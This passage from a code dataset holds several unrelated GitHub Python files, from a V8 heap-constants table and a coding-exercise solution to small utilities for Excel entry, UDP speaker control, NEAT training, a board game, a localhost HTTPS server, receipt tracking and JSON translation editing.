\"InternalizedStringMap\"),\n (\"RO_SPACE\", 0x04159): (2, \"ExternalInternalizedStringMap\"),\n (\"RO_SPACE\", 0x041a9): (18, \"ExternalInternalizedStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x041f9): (10, \"ExternalOneByteInternalizedStringMap\"),\n (\"RO_SPACE\", 0x04249): (34, \"UncachedExternalInternalizedStringMap\"),\n (\"RO_SPACE\", 0x04299): (50, \"UncachedExternalInternalizedStringWithOneByteDataMap\"),\n (\"RO_SPACE\", 0x042e9): (42, \"UncachedExternalOneByteInternalizedStringMap\"),\n (\"RO_SPACE\", 0x04339): (106, \"UncachedExternalOneByteStringMap\"),\n (\"RO_SPACE\", 0x04389): (140, \"FixedUint8ArrayMap\"),\n (\"RO_SPACE\", 0x043d9): (139, \"FixedInt8ArrayMap\"),\n (\"RO_SPACE\", 0x04429): (142, \"FixedUint16ArrayMap\"),\n (\"RO_SPACE\", 0x04479): (141, \"FixedInt16ArrayMap\"),\n (\"RO_SPACE\", 0x044c9): (144, \"FixedUint32ArrayMap\"),\n (\"RO_SPACE\", 0x04519): (143, \"FixedInt32ArrayMap\"),\n (\"RO_SPACE\", 0x04569): (145, \"FixedFloat32ArrayMap\"),\n (\"RO_SPACE\", 0x045b9): (146, \"FixedFloat64ArrayMap\"),\n (\"RO_SPACE\", 0x04609): (147, \"FixedUint8ClampedArrayMap\"),\n (\"RO_SPACE\", 0x04659): (149, \"FixedBigUint64ArrayMap\"),\n (\"RO_SPACE\", 0x046a9): (148, \"FixedBigInt64ArrayMap\"),\n (\"RO_SPACE\", 0x046f9): (131, \"SelfReferenceMarkerMap\"),\n (\"RO_SPACE\", 0x04761): (171, \"Tuple2Map\"),\n (\"RO_SPACE\", 0x04801): (173, \"ArrayBoilerplateDescriptionMap\"),\n (\"RO_SPACE\", 0x04af1): (161, \"InterceptorInfoMap\"),\n (\"RO_SPACE\", 0x06ea9): (153, \"AccessCheckInfoMap\"),\n (\"RO_SPACE\", 0x06ef9): (154, \"AccessorInfoMap\"),\n (\"RO_SPACE\", 0x06f49): (155, \"AccessorPairMap\"),\n (\"RO_SPACE\", 0x06f99): (156, \"AliasedArgumentsEntryMap\"),\n (\"RO_SPACE\", 0x06fe9): (157, \"AllocationMementoMap\"),\n (\"RO_SPACE\", 0x07039): (158, \"AsyncGeneratorRequestMap\"),\n (\"RO_SPACE\", 0x07089): (159, \"DebugInfoMap\"),\n (\"RO_SPACE\", 0x070d9): (160, \"FunctionTemplateInfoMap\"),\n (\"RO_SPACE\", 0x07129): (162, \"InterpreterDataMap\"),\n (\"RO_SPACE\", 0x07179): (163, \"ModuleInfoEntryMap\"),\n (\"RO_SPACE\", 0x071c9): (164, \"ModuleMap\"),\n (\"RO_SPACE\", 0x07219): (165, \"ObjectTemplateInfoMap\"),\n (\"RO_SPACE\", 0x07269): (166, \"PromiseCapabilityMap\"),\n (\"RO_SPACE\", 0x072b9): (167, \"PromiseReactionMap\"),\n (\"RO_SPACE\", 0x07309): (168, \"PrototypeInfoMap\"),\n (\"RO_SPACE\", 0x07359): (169, \"ScriptMap\"),\n (\"RO_SPACE\", 0x073a9): (170, \"StackFrameInfoMap\"),\n (\"RO_SPACE\", 0x073f9): (172, \"Tuple3Map\"),\n (\"RO_SPACE\", 0x07449): (174, \"WasmDebugInfoMap\"),\n (\"RO_SPACE\", 0x07499): (175, \"WasmExportedFunctionDataMap\"),\n (\"RO_SPACE\", 0x074e9): (176, \"CallableTaskMap\"),\n (\"RO_SPACE\", 0x07539): (177, \"CallbackTaskMap\"),\n (\"RO_SPACE\", 0x07589): (178, \"PromiseFulfillReactionJobTaskMap\"),\n (\"RO_SPACE\", 0x075d9): (179, \"PromiseRejectReactionJobTaskMap\"),\n (\"RO_SPACE\", 0x07629): (180, \"PromiseResolveThenableJobTaskMap\"),\n (\"RO_SPACE\", 0x07679): (181, \"MicrotaskQueueMap\"),\n (\"RO_SPACE\", 0x076c9): (182, \"AllocationSiteWithWeakNextMap\"),\n (\"RO_SPACE\", 0x07719): (182, \"AllocationSiteWithoutWeakNextMap\"),\n (\"RO_SPACE\", 0x07769): (214, \"LoadHandler1Map\"),\n (\"RO_SPACE\", 0x077b9): (214, \"LoadHandler2Map\"),\n (\"RO_SPACE\", 0x07809): (214, \"LoadHandler3Map\"),\n (\"RO_SPACE\", 0x07859): (221, \"StoreHandler0Map\"),\n (\"RO_SPACE\", 0x078a9): (221, \"StoreHandler1Map\"),\n (\"RO_SPACE\", 0x078f9): (221, \"StoreHandler2Map\"),\n (\"RO_SPACE\", 0x07949): (221, \"StoreHandler3Map\"),\n (\"MAP_SPACE\", 0x02201): (1057, \"ExternalMap\"),\n (\"MAP_SPACE\", 0x02251): (1072, \"JSMessageObjectMap\"),\n}\n\n# List of known V8 objects.\nKNOWN_OBJECTS = {\n (\"RO_SPACE\", 0x022a1): \"NullValue\",\n (\"RO_SPACE\", 0x02321): \"EmptyDescriptorArray\",\n (\"RO_SPACE\", 0x02491): \"UninitializedValue\",\n (\"RO_SPACE\", 0x025a1): \"UndefinedValue\",\n (\"RO_SPACE\", 0x02621): \"NanValue\",\n (\"RO_SPACE\", 0x02681): \"TheHoleValue\",\n (\"RO_SPACE\", 0x02719): \"HoleNanValue\",\n (\"RO_SPACE\", 0x02729): \"TrueValue\",\n (\"RO_SPACE\", 0x027d9): \"FalseValue\",\n (\"RO_SPACE\", 0x02821): \"empty_string\",\n (\"RO_SPACE\", 0x02ce1): \"EmptyScopeInfo\",\n (\"RO_SPACE\", 0x02cf1): \"EmptyFixedArray\",\n (\"RO_SPACE\", 0x02d01): \"ArgumentsMarker\",\n (\"RO_SPACE\", 0x02da1): \"Exception\",\n (\"RO_SPACE\", 0x02e41): \"TerminationException\",\n (\"RO_SPACE\", 0x02ee9): \"OptimizedOut\",\n (\"RO_SPACE\", 0x02f89): \"StaleRegister\",\n (\"RO_SPACE\", 0x047c1): \"EmptyByteArray\",\n (\"RO_SPACE\", 0x04851): \"EmptyFixedUint8Array\",\n (\"RO_SPACE\", 0x04871): \"EmptyFixedInt8Array\",\n (\"RO_SPACE\", 0x04891): \"EmptyFixedUint16Array\",\n (\"RO_SPACE\", 0x048b1): \"EmptyFixedInt16Array\",\n (\"RO_SPACE\", 0x048d1): \"EmptyFixedUint32Array\",\n (\"RO_SPACE\", 0x048f1): \"EmptyFixedInt32Array\",\n (\"RO_SPACE\", 0x04911): \"EmptyFixedFloat32Array\",\n (\"RO_SPACE\", 0x04931): \"EmptyFixedFloat64Array\",\n (\"RO_SPACE\", 0x04951): \"EmptyFixedUint8ClampedArray\",\n (\"RO_SPACE\", 0x049b1): \"EmptySloppyArgumentsElements\",\n (\"RO_SPACE\", 0x049d1): \"EmptySlowElementDictionary\",\n (\"RO_SPACE\", 0x04a19): \"EmptyOrderedHashMap\",\n (\"RO_SPACE\", 0x04a41): \"EmptyOrderedHashSet\",\n (\"RO_SPACE\", 0x04a79): \"EmptyPropertyCell\",\n (\"RO_SPACE\", 0x04b59): \"InfinityValue\",\n (\"RO_SPACE\", 0x04b69): \"MinusZeroValue\",\n (\"RO_SPACE\", 0x04b79): \"MinusInfinityValue\",\n (\"RO_SPACE\", 0x04b89): \"SelfReferenceMarker\",\n (\"OLD_SPACE\", 0x02211): \"EmptyScript\",\n (\"OLD_SPACE\", 0x02291): \"ManyClosuresCell\",\n (\"OLD_SPACE\", 0x022b1): \"NoElementsProtector\",\n (\"OLD_SPACE\", 0x022d9): \"IsConcatSpreadableProtector\",\n (\"OLD_SPACE\", 0x022e9): \"ArraySpeciesProtector\",\n (\"OLD_SPACE\", 0x02311): \"TypedArraySpeciesProtector\",\n (\"OLD_SPACE\", 0x02339): \"PromiseSpeciesProtector\",\n (\"OLD_SPACE\", 0x02361): \"StringLengthProtector\",\n (\"OLD_SPACE\", 0x02371): \"ArrayIteratorProtector\",\n (\"OLD_SPACE\", 0x02399): \"ArrayBufferNeuteringProtector\",\n (\"OLD_SPACE\", 0x02421): \"StringIteratorProtector\",\n}\n\n# List of known V8 Frame Markers.\nFRAME_MARKERS = (\n \"ENTRY\",\n \"CONSTRUCT_ENTRY\",\n \"EXIT\",\n \"OPTIMIZED\",\n \"WASM_COMPILED\",\n \"WASM_TO_JS\",\n \"JS_TO_WASM\",\n \"WASM_INTERPRETER_ENTRY\",\n \"C_WASM_ENTRY\",\n \"WASM_COMPILE_LAZY\",\n \"INTERPRETED\",\n \"STUB\",\n \"BUILTIN_CONTINUATION\",\n \"JAVA_SCRIPT_BUILTIN_CONTINUATION\",\n \"JAVA_SCRIPT_BUILTIN_CONTINUATION_WITH_CATCH\",\n \"INTERNAL\",\n \"CONSTRUCT\",\n \"ARGUMENTS_ADAPTOR\",\n \"BUILTIN\",\n \"BUILTIN_EXIT\",\n \"NATIVE\",\n)\n\n# This set of constants is generated from a shipping build.\n","repo_name":"ofrobots/no-bazel","sub_path":"third_party/v8/tools/v8heapconst.py","file_name":"v8heapconst.py","file_ext":"py","file_size_in_byte":16702,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"3346129392","text":"# \"변수 설정\"\n# \"판별 할 수 있는 set 구성\"\n\ncabc = {'c=', 'c-', 'dz=', 'd-', 'lj', 'nj', 's=', 'z='}\n\n\nsr = str(input())\n\ndef word(sr) :\n word_cnt = 0\n for i in range(0,len(sr)):\n sr_list= list(sr)\n if sr_list[i]==\"d\" or \"c\" or \"l\" or \"n\" or \"s\" or \"z\":\n if {sr_list[i]+sr_list[i+1]+sr_list[i+2]}.isdisjoint(cabc):\n word_cnt += 1\n elif {sr_list[i]+sr_list[i+1]}.isdisjoint(cabc):\n word_cnt += 1\n else:\n word_cnt += 1\n return word_cnt\n\nprint(word(sr))\n\n\"\"\"\nsr = input()\n\nfor i in cabc:\n sr = sr.replace(i,'*')\n\nprint(len(sr))\n\"\"\"","repo_name":"kimyoo04/baekjoon-algorithm-study","sub_path":"Python/1. 실버/5/2941번 크로아티아 알파벳.py","file_name":"2941번 크로아티아 알파벳.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33856028531","text":"from openpyxl import load_workbook\nimport easygui\n\nworkbook_name = 'List.xlsx'\nwb = load_workbook(workbook_name)\npage = wb.active\n\n# New data to write:\ndef dataEntry():\n fieldNames = ['Date','Job ID','Job Title','Job Description','Company Name','Client Name']\n fieldVals = easygui.multenterbox('Enter the Data','Job Entry List', fieldNames)\n d, j_id, j_title, j_description,c_name, cli_name = fieldVals\n row = [fieldVals]\n \n if j_id == '': \n easygui.msgbox(msg=\"Data is required\", title=\"Data Error\", ok_button=\"OK\")\n return\n\n for r in range(2,page.max_row+1):\n cell = \"{}{}\".format('B', r)\n if j_id == page[cell].value:\n easygui.msgbox(msg=\"Data already exist\", title=\"Data Error\", ok_button=\"OK\")\n return\n \n for info in row:\n page.append(info)\n \ndataEntry()\nwhile True:\n if easygui.boolbox('Do you have data to Enter??', 'Data', [\"YES\", \"NO \"]):\n dataEntry() \n \n else: break\n\nprint(\"Total Number of records:\",page.max_row-1)\nwb.save(filename=workbook_name)","repo_name":"tummalag/data_entry","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72310839442","text":"import logging\nimport socket\n\nUDP_PORT = 7777\n\n\ndef send_command(device_ip: str, command: bytes):\n logging.info(f\"Sending to {device_ip} command: {command.decode()}\")\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(command, (device_ip, UDP_PORT))\n","repo_name":"inverse/python-libratone","sub_path":"libratone/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38194334104","text":"from nested_dict import *\nimport numpy as np\nimport pymysql\nfrom numpy import zeros\nimport matplotlib.pyplot as plt\nfrom resolver import *\nimport random\nimport math\nimport sys\nimport os\nfrom textwrap import wrap\n\ninfile = open('arp_analyze_v6.txt.bk','r')\n# now I want to calculate Median Absolute Deviation\n\niterations = 10\n\n# base_path = '/root/PycharmProjects/printer_social/ego_analysis/'\n# for filename in os.listdir(base_path):\n# for ffile in os.listdir(base_path + filename):\n# os.unlink(base_path+filename + '/' + ffile)\n\n\n\n\n\n# create zero array\nglobal nd\nnd = nested_dict(2, list)\n\n\ndef add_to_nd(threshold,host_from,index):\n nd[threshold][host_from][index] += 1\n\ndef PD_serv_sys_analyze(threshold, type_to,host_from):\n nd.setdefault(threshold, {}).setdefault(host_from, [0]*(4))\n if type_to == \"PD\":\n add_to_nd(threshold,host_from, 0)\n elif type_to == \"service\":\n add_to_nd(threshold, host_from, 1)\n elif type_to == \"sysadmin\":\n add_to_nd(threshold, host_from, 2)\n else:\n add_to_nd(threshold, host_from, 3)\n\n\nall_lines = infile.readlines()\n\n\nfor threshold in range(0,iterations):\n #PD_to_PD = PD_to_service = PD_to_sysadmin = service_to_service = service_to_sysadmin = sysadmin_to_sysadmin = 0\n for line in all_lines:\n line = line[:-1]\n if '[' not in line or ']' not in line:\n continue\n host_from = line.split(' ')[0]\n host_to = line.split(' ')[1]\n interactions = line.split(' ')[-1].replace('[','').replace(']','').split(',')\n try:\n interactions = [int(item) for item in interactions]\n except ValueError as e :\n print(interactions)\n #del data[5:7]\n\n # method two is to use average frequency per day\n temp = []\n dsum = np.sum(interactions)\n avg_freq = dsum/len(interactions)\n if avg_freq > (threshold):\n type_from = get_type(host_from)\n type_to = get_type(host_to)\n if type_from is not None and type_to is not None :\n key_resolved = resolve_by_db(host_from)\n host_resolved = resolve_by_db(host_to)\n if key_resolved == \"''\" or key_resolved is None or key_resolved == \"\":\n key_resolved = host_from\n if host_resolved == \"''\" or host_resolved is None or host_resolved == \"\":\n host_resolved = host_to\n PD_serv_sys_analyze(threshold,type_to,host_from)\n\nprint(nd)\n\n\npd_dict = {}\nserv_dict = {}\nsys_dict = {}\nunknown_dict = {}\n\ndef calculate_percent(my_list):\n temp_list = []\n for item in my_list:\n temp_list.append(int(item/sum(my_list) * 100))\n return temp_list\n\nmy_threshold = 1\nfor ip in nd[my_threshold]:\n ttype = get_type(ip)\n host_resolved = resolve_by_db(ip)\n if host_resolved == \"''\" or host_resolved is None or host_resolved == \"\":\n host_resolved = ip\n if ttype == \"PD\":\n pd_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n elif ttype == 'service':\n serv_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n elif ttype == \"sysadmin\":\n sys_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n else:\n unknown_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n\nprint(\"PD : \" + str(pd_dict))\nprint(\"service : \" + str(serv_dict))\nprint(\"sysadmin : \" + str(sys_dict))\nprint(\"others : \" + str(unknown_dict))\n\n\nwidth = 0.15\nmy_lables = 'PD','service','sysadmin', 'unknown'\n#\nx_ind = np.arange(len(pd_dict))\n\n# # Plot\ndisplay_threshold = 30 # this means that each plot should have at most 30 xes.\n\n\ncounter = 0\nfor type_dict in [pd_dict,serv_dict,sys_dict,unknown_dict]:\n partial_lists = []\n my_bins = int(len(type_dict) / display_threshold)\n type_dict_items = list(type_dict.items())\n while len(type_dict_items) > 0 :\n cut_index = min(len(type_dict_items),display_threshold)\n partial_lists.append(dict(type_dict_items[:cut_index]))\n del type_dict_items[:cut_index]\n\n in_counter = 1\n for part_dict in partial_lists:\n pd_values = [item[0] for item in part_dict.values()]\n serv_values = [item[1] for item in part_dict.values()]\n sys_values = [item[2] for item in part_dict.values()]\n unknown_values = [item[3] for item in part_dict.values()]\n\n x_ind = range(len(part_dict))\n width = 0.5\n plt.figure(figsize=(25, 10)) # width:20, height:3\n p1 = plt.bar(x_ind, pd_values, color='tab:red',align='edge', width=width)\n p2 = plt.bar(x_ind, serv_values,bottom=pd_values, color='tab:orange',align='edge', width=width)\n p3 = plt.bar(x_ind, sys_values,bottom=[sum(x) for x in zip(serv_values,pd_values)], color='tab:blue',align='edge', width=width)\n p4 = plt.bar(x_ind, unknown_values,bottom=[sum(x) for x in zip(sys_values,serv_values,pd_values)], color='tab:green',align='edge', width=width)\n\n my_temp = [item.replace('iit.cnr.it.','') for item in part_dict.keys()]\n my_temp = ['\\n'.join(wrap(l, 10)) for l in my_temp]\n\n plt.xticks(x_ind,my_temp ,rotation='vertical',fontsize=12)\n\n plt.legend(( p1[0], p2[0],p3[0], p4[0]), (my_lables))\n\n if counter == 0:\n out_pic = 'ego_analysis/pd_ego_figures/pd_ego_part' + str(in_counter) + \".png\"\n elif counter == 1:\n out_pic = 'ego_analysis/serv_ego_figures/serv_ego_part' + str(in_counter) + \".png\"\n elif counter == 2:\n out_pic = 'ego_analysis/sys_ego_figures/sys_ego_part' + str(in_counter) + \".png\"\n if counter == 3:\n out_pic = 'ego_analysis/unknown_ego_figures/unknown_ego_part' + str(in_counter) + \".png\"\n\n plt.savefig(out_pic)\n plt.clf()\n in_counter +=1\n\n counter += 1","repo_name":"vahidzolf/SocialIoT","sub_path":"ego_analysis_Lan.py","file_name":"ego_analysis_Lan.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11385406738","text":"\"\"\"\n2-input XOR example -- this is most likely the simplest possible example.\n\"\"\"\n\nfrom __future__ import print_function\nfrom sklearn.externals import joblib\nimport os\nimport neat\nimport numpy\nimport visualize\n\n# 2-input XOR inputs and expected outputs.\nxor_inputs = [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]\nxor_outputs = [(0.0,), (1.0,), (1.0,), (0.0,)]\n\n\ndef load_data():\n #############\n # LOAD DATA #\n #############\n\n print('... loading data')\n\n # Load the dataset\n f = numpy.loadtxt(\"breastcancer.data\", delimiter=\",\", dtype=None)\n\n numpy.random.shuffle(f)\n dataset_input = f[0:20, 3:12]\n dataset_input = list(tuple(map(tuple, dataset_input)))\n\n dataset_output = f[0:20, 2:3]\n for i in dataset_output:\n i[0] = 0 if i[0] == 2 else 1\n dataset_output = list(tuple(map(tuple, dataset_output)))\n\n rval = [dataset_input, dataset_output]\n return rval\n\n\n# Load dataset\ndatasetX = load_data()[0]\ndatasetY = load_data()[1]\n\n\ndef eval_genomes(genomes, config):\n for genome_id, genome in genomes:\n genome.fitness = 30.0\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n for xi, xo in zip(datasetX, datasetY):\n output = net.activate(xi)\n genome.fitness -= (output[0] - xo[0]) ** 2\n\ndef display(winner, config):\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n\n for xi, xo in zip(datasetX, datasetY):\n output = winner_net.activate(xi)\n print(\"input {!r}, expected output {!r}, got {!r}\".format(xi, xo, output))\n\n\ndef run(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(50))\n\n # Run for up to 300 generations.\n winner = p.run(eval_genomes, 1000)\n\n # Save the model the pickle file\n joblib.dump(winner, \"neat_model.pkl\")\n\n display(winner, config)\n node_names = {0: 'Breast Cancer'}\n visualize.draw_net(config, winner, True, node_names=node_names)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n\n\n #\n # p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-4')\n # p.run(eval_genomes, 10)\ndef cont(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-1899')\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(100))\n winner = p.run(eval_genomes, 500)\n\n display(winner, config)\n node_names = {0: 'Breast Cancer'}\n visualize.draw_net(config, winner, True, node_names=node_names)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n\ndef load(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Load model\n winner = joblib.load(\"neat_model.pkl\")\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n\n error = 0\n for xi, xo in zip(datasetX, datasetY):\n output = winner_net.activate(xi)\n print(\"input {!r}, expected output {!r}, got {!r}\".format(xi, xo, output))\n error += (xo[0] - output[0]) ** 2\n\n print(\"\\nRoot mean square error: %f\" % error)\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward')\n load(config_path)\n # cont(config_path)\n","repo_name":"batectin/FYP_EDANN","sub_path":"xor_neat.py","file_name":"xor_neat.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3917512202","text":"\"\"\"\r\nFile: board_square.py\r\nAuthor: Alex Strong\r\nDate: 11/15/2020\r\nSection: 44\r\nE-mail: astrong3@umbc.edu\r\nDescription: This code stores the classes which assist to run the game such as the\r\n UrPiece class and the BoardSquare class which contain methods and attributes\r\n to keep track of components, and help the game to run smoothly\r\n\"\"\"\r\nclass UrPiece:\r\n def __init__(self, color, symbol, rosettes, entrance, exit):\r\n self.color = color\r\n self.position = None\r\n self.complete = False\r\n self.symbol = symbol\r\n self.rosettes = rosettes\r\n self.entrance = entrance\r\n self.exit = exit\r\n\r\n def can_move(self, num_moves):\r\n \"\"\"\r\n Runs basically the same code as move_piece function, but instead of changing piece and board values\r\n it instead checks to see if the piece is able to remove and returns either true or false\r\n :param num_moves:\r\n :return:\r\n \"\"\"\r\n temp_num_moves = num_moves\r\n this_piece = self\r\n most_recent_square = None\r\n original_position = self.position\r\n\r\n # same code comments as move_piece\r\n while temp_num_moves != 0:\r\n if not this_piece.position and not this_piece.complete:\r\n this_piece.position = this_piece.entrance\r\n most_recent_square = this_piece.position\r\n elif this_piece.position and not this_piece.complete:\r\n if this_piece.color == 'White':\r\n if this_piece.position.exit == 'White':\r\n if temp_num_moves == 1:\r\n # if the piece is on an exit position and can move only 1 spot forward then it can move\r\n return True\r\n else:\r\n # if the piece reaches exit position and has more than 1 move then it cannot exit\r\n return False\r\n else:\r\n this_piece.position = this_piece.position.next_white\r\n most_recent_square = this_piece.position\r\n else:\r\n if this_piece.color == 'Black':\r\n if this_piece.position.exit == 'Black':\r\n if temp_num_moves == 1:\r\n # same as with white color\r\n return True\r\n else:\r\n return False\r\n else:\r\n this_piece.position = this_piece.position.next_black\r\n most_recent_square = this_piece.position\r\n temp_num_moves -= 1\r\n this_piece.position = original_position\r\n\r\n if most_recent_square:\r\n if most_recent_square.piece:\r\n # if color is the same then you cannot move onto that piece\r\n if most_recent_square.piece.color == self.color:\r\n return False\r\n # if color is different but the piece is on a rosette then you cannot bump them off\r\n elif most_recent_square.piece.color != self.color and most_recent_square.rosette:\r\n return False\r\n # if color is different but piece not on rosette then you can move there and bump them off\r\n elif most_recent_square.piece.color != self.color and not most_recent_square.rosette:\r\n return True\r\n # if square piece is empty then you can move onto it\r\n else:\r\n return True\r\n\r\n\r\nclass BoardSquare:\r\n def __init__(self, x, y, entrance=False, _exit=False, rosette=False, forbidden=False):\r\n self.piece = None\r\n self.position = (x, y)\r\n self.next_white = None\r\n self.next_black = None\r\n self.exit = _exit\r\n self.entrance = entrance\r\n self.rosette = rosette\r\n self.forbidden = forbidden\r\n\r\n def load_from_json(self, json_string):\r\n import json\r\n loaded_position = json.loads(json_string)\r\n self.piece = None\r\n self.position = loaded_position['position']\r\n self.next_white = loaded_position['next_white']\r\n self.next_black = loaded_position['next_black']\r\n self.exit = loaded_position['exit']\r\n self.entrance = loaded_position['entrance']\r\n self.rosette = loaded_position['rosette']\r\n self.forbidden = loaded_position['forbidden']\r\n\r\n def jsonify(self):\r\n next_white = self.next_white.position if self.next_white else None\r\n next_black = self.next_black.position if self.next_black else None\r\n return {'position': self.position, 'next_white': next_white, 'next_black': next_black, 'exit': self.exit, 'entrance': self.entrance, 'rosette': self.rosette, 'forbidden': self.forbidden}\r\n","repo_name":"alexestrong/Python-RoyalGameOfUr-Emulator","sub_path":"board_square.py","file_name":"board_square.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14735121240","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\nimport ssl\n\n# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365\n# https://localhost:4433\n\nhttpd = HTTPServer(('localhost', 4433), SimpleHTTPRequestHandler)\n\nhttpd.socket = ssl.wrap_socket(\n httpd.socket,\n keyfile = \"key.pem\", \n certfile = 'cert.pem',\n server_side = True)\n\nhttpd.serve_forever()\n","repo_name":"andreypudov/sharelink-preview","sub_path":"artifacts/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27564352636","text":"from backend.ReceiptTracker import ReceiptTracker\nfrom backend.Item import Item\n\nclass model():\n receipts = None\n receipt_change_listeners = None\n person_change_listeners = None\n\n def __init__(self):\n self.receipts = list()\n self.receipt_change_listeners = set()\n self.person_change_listeners = set()\n\n def get_names(self):\n names = list()\n for receipt in self.receipts:\n names.append(receipt.get_name())\n \n return names\n\n def add_receipt_line(self, people, name, cost):\n shared_item = Item(name, cost)\n print(cost)\n try:\n float(cost)\n except ValueError as error:\n raise TypeError\n\n for receipt in self.receipts:\n for person in people:\n if person == receipt.get_name():\n receipt.add_receipt_line(shared_item, 1/(len(people)+1))\n \n self.update_receipt_listeners()\n \n def update_receipt_listeners(self):\n for receipt_listener in self.receipt_change_listeners:\n receipt_listener.receipt_update(self)\n \n def add_receipt_listeners(self, receipt_listener):\n self.receipt_change_listeners.add(receipt_listener)\n\n #returns whole receipt as string\n def receipt_to_string(self, receipt_name):\n return_string = \"\"\n\n for receipt in self.receipts:\n #print(receipt_name, receipt.get_name())\n if receipt_name == receipt.get_name():\n return_string = receipt.to_string()\n \n return return_string\n\n #returns set of receipt lines as strings\n def receipt_to_string_set(self, receipt_name):\n receipt_lines_strings = None\n\n for receipt in self.receipts:\n if receipt_name == receipt.get_name():\n receipt_lines_strings = receipt.to_string_set()\n \n return receipt_lines_strings\n\n def add_person(self, name):\n print(name)\n if name != \"\" and name not in self.get_names():\n self.receipts.append(ReceiptTracker(name))\n for listener in self.person_change_listeners:\n listener.person_update(self)\n \n def add_person_change_listeners(self, listener):\n self.person_change_listeners.add(listener)\n \n # def remove_person(self, name):\n # for receipt in self.receipts:\n # if receipt.name == name:\n # receipts.remove(receipt)\n\n def get_total(self, name):\n total = 0\n for receipt in self.receipts:\n if name == receipt.get_name():\n total = receipt.get_owed()\n return total","repo_name":"s3716853/Receipt_Tracker","sub_path":"receipt_manager/backend/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14563230241","text":"import json\r\nimport tkinter as tk\r\n\r\ndef compare_json_files(model_file, translation_file):\r\n with open(model_file, 'r', encoding='utf-8') as file1, open(translation_file, 'r+', encoding='utf-8') as file2:\r\n model_data = json.load(file1)\r\n translation_data = json.load(file2)\r\n \r\n missing_keys = [key for key in model_data if key not in translation_data]\r\n extra_keys = [key for key in translation_data if key not in model_data]\r\n \r\n for key in extra_keys:\r\n del translation_data[key]\r\n \r\n def submit():\r\n nonlocal current_key_index\r\n key = missing_keys[current_key_index]\r\n value = entry.get(\"1.0\", tk.END).strip()\r\n \r\n if value:\r\n translation_data[key] = value\r\n \r\n if current_key_index < len(missing_keys) - 1:\r\n entry.insert(tk.END, ',\\n')\r\n \r\n file2.seek(0)\r\n json.dump(translation_data, file2, indent=4, ensure_ascii=False)\r\n file2.truncate()\r\n \r\n current_key_index += 1\r\n if current_key_index < len(missing_keys):\r\n show_next_key()\r\n else:\r\n root.quit()\r\n\r\n def show_next_key():\r\n key = missing_keys[current_key_index]\r\n entry.delete(\"1.0\", tk.END)\r\n entry.insert(tk.END, \"\")\r\n label.config(text=f\"Missing Translation:\\n\\nKey: {key}\\nValue: {model_data[key]}\")\r\n\r\n root = tk.Tk()\r\n root.title(\"Translation Editor\")\r\n root.iconbitmap('icon.ico')\r\n root['bg']='#2f2f2f'\r\n \r\n label = tk.Label(root, text=\"\")\r\n label.pack()\r\n \r\n entry = tk.Text(root, height=10, width=50)\r\n entry.pack()\r\n \r\n submit_button = tk.Button(root, text=\"Submit\", command=submit)\r\n submit_button.pack()\r\n \r\n current_key_index = 0\r\n show_next_key()\r\n \r\n 